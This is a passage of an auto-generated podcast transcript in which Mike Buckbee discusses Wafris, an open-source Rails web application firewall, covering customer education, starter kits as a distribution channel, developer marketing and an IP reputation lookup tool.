Starting point is 00:43:52 Yep. Yep. Gotcha. Is there a lot of just like working with Wafers and X-rated Waf, just like education you've had to do for customers and things like that? Do you feel like that's like a big part of your job? Yes and no. I mean, certainly the customers that are like mandated to get a web application firewall less so because they're just like desperate for stuff. But I think the education,
Starting point is 00:44:15 the best analogy is a toolbox. That's all this is. It's not magic. It doesn't do some super secure thing. It just gives you the ability to like, when there is an issue, actually take care of it in a reasonable way. In a way, like I, I, I have had multiple calls with people like two in the morning, their time, they're been up for 24 hours. Their site has been down that whole time. And they're just desperate. They're like, and that's not a good time to be like, well, which of these different enterprise framework options should we choose? Like, it's just hard. So again, and this is Wafris is our reaction to all these problems. It's like, it's open source. It's, you know, in rails, it's just a gem. It's a library. You install it. It's there. If you need it,
Starting point is 00:45:03 you can check your traffic. You can, you know, see where this stuff happens. So, yeah. Yeah. Yeah. I want to talk about Rails a little bit because I have never written any Rails, but I like to do just sort of like vibe checks of where we're at. And it's hard to tell on Twitter because there's so much stuff. But it seems like there's a bit of a shift back towards like full stack frameworks and some of that stuff. And like, hey, some of the craziness of full-stack JavaScript,
Starting point is 00:45:27 like was, was not worth it. And actually it's nice to have some of this stuff, I guess, like what have you seen in the, in the rails or, or like, you know,
Starting point is 00:45:34 where about like different, different full-stack frameworks that you provide for, are you seeing, I guess, five shifts there or what's that feel like the last couple of years? It's hard to tell. I mean, honestly,
Starting point is 00:45:45 well, and I think there is just so much application development that's happening. It's hard to tell. I do see a lot of very split applications and we have a lot, probably 35, 40% of the applications we protect with Expedited are essentially like api.domain.com. And they have a front end app.
Starting point is 00:46:04 Maybe it's on Verso and novi or whatever and then the back end is on heroku and that's you know doing all the heavy lifting back end work and still choosing you know it's this right right tool for the right job you know kind of stuff yep for sure i y'all had a good post on adding in Jumpstart Pro. And I'm not familiar. I've heard of this a little bit. And I just want to understand a little bit. So as I understand, you had Wafers as a Rails application. It was sort of like MVP or just like at least that early version of it.
Starting point is 00:46:37 And then Jumpstart Pro is like this sort of, I don't want to say template, but like a toolkit that has like a lot of sort of opinionated rails, a starter kit. There you go. And so you like bolted that on after the fact. I guess like, tell me a little bit about like why, why you decided to do that, how that, how that went and what that was like. Sure. So there's really two sides of it. One small team trying to be very efficient and starter kits are a good way to do that. It is the case that, you know, there's a lot of things out of the box. You don't want to have to write from scratch, like for every single project,
Starting point is 00:47:13 interacting with Stripe, you know, doing all that stuff, managing plant. And so, so why do it? The other thing, and this may be unique to us, but I think, you know, speaks a little bit to like the overlap of the marketing and development stuff is that I think SaaS starter kits are a distribution channel for Wafras. And that's part of the reason we're strategically open source is that, you know, Jumpstart is a very popular starter kit. They include Wafras in it. So, you know, so people just get it out of the box um another one is bullet train yeah i've heard what train yeah okay uh they were acquired by
Starting point is 00:47:55 click funnels um so andrew culver's starter kit and you know we're included in there we're included in some other ones and that's just a distribution channel for us uh and so you know it makes sense to to be familiar and use the things that you know also promote us so yeah yeah tell me a little bit about you know your background both as a developer and marketing i just like how do you think about marketing to developers what's a what's effective for that well i think it is a challenge uh you know, a real challenge we have with Wafris is that there's not, it's not often very legible, like who is really in need of this. Like I laid out the scenarios and those are real scenarios. And something I feel very happy about is that,
Starting point is 00:48:41 you know, especially doing the security work is this is very positive work. It's very positive for developers, very positive for these sites. It's not something that, you know, feels scummy in any way. And yeah, so I think I lost the thread of the question. Marketing to developers. And so I think part of this is, so it's hard to target those people other than like very broad things. So this article was an attempt, um, to reach more developers by just sharing like what we're going through and our expertise and like our particular bit of this. Um, it was on hacker news. It was on a lot of the big, the major like subreddits for programming and SQLite and stuff on Reddit, uh, and lots of, lots of shared, you know, things. So do a lot of that. And then I try to do a lot of, uh, software engineering is marketing. I have a different site for a good
Starting point is 00:49:36 STRF time, which just helps you format date time strings. Um, so that's been around for a long time and it actually drives quite a bit of traffic to the WAFRA site. We have a link at the bottom of it. And I had originally made that for a meetup for a talk, just like, Oh, here's how easy and quick it is to make something. And again, one of those things that it's just been very useful to people. So trying to be useful, trying to be helpful, make things I think are all directionally positive ways of doing marketing so yep yep i love that like sharing knowledge stuff you know like just nerd sniping people like you did with this this thing where it's like oh wow going from redis to sqlite and
Starting point is 00:50:15 getting faster i think that like at least like tweaks people's interests and and getting a sense of that and then yeah that for for a good strf time we'll include that but it like reminds me of you know auth0 had jwt.io and i think a lot of people just use that for good STRF time, we'll include that. But it reminds me of Auth0 had JWT.io. And I think a lot of people just use that for different things. And I think just like, yeah, like you're saying, having just helpful tools and then sharing your tool as part of it. So a tool we have for Wafers is IP lookup that you can go to the site, no sign up or anything, and put an IP address in. And it will do a lookup of it of all the sort of different reputational information. And having used a lot of these services, I think ours is a lot better. Like we do some other things to try to give more context to
Starting point is 00:50:57 it. Like we look up actually not just the IP address that's put in, but all the IP addresses around it. Cause oftentimes that indicates like, Oh, this is actually in one of those bot farms. Cause everything in it is well known to all these block lists. You can actually launch like a probe of that IP address from the website to see if it has active like VPN and proxy stuff happening on it. So, and that's, that's again, it's a free tool. We get a lot of sign's, that's, again, it's a free tool. We get a lot of signups from that just because again, it's useful just out there. So.
Starting point is 00:51:29 Yep. Where do you like that IP reputation stuff? Is that something that you like buy from some other service provider? Are you calculating, like, do you see enough traffic that you calculate it yourself? Or like, what's that sort of look like? All the above. I mean, and that's really, because I don't want to get you to give away your secret sauce or anything here if that's. Yeah, but well, it's it's a Google away. So it's not it's not that secret. Certainly, you can go out and license this data. I think the real part where expertise comes in is that some of these lists are more reliable than others.
Starting point is 00:52:00 And what you don't want to do is block people unnecessarily. So we've learned through hard experience sort of how to filter out this giant list of noise and things. So, yeah. Yeah, yeah, very cool. Mike, thanks for coming on the show. This has been great. Like, again, I love your post and it's been great learning about Wafris
Starting point is 00:52:18 and all these different things. If people want to find out more about you, about Wafris, where should they go? I'm still on Twitter. Still reluctant to say that, but, you know, I'm still on Twitter mostly because a lot of mute words. I'm still on Twitter at mbuckbee. And I am on LinkedIn, but who uses that? And, yeah, you can go to Wafers.org.
Starting point is 00:52:45 Check it out. Yeah. Cool. Mike Buckbee, author of Re-Architecting, read us the sequel. One of my favorite posts of the year. Thanks for coming on. Awesome.
Starting point is 00:52:54 Well, thanks so much, Alex. This has been a delight. Yeah, great.

There aren't comments yet for this episode. Click on any sentence in the transcript to leave a comment.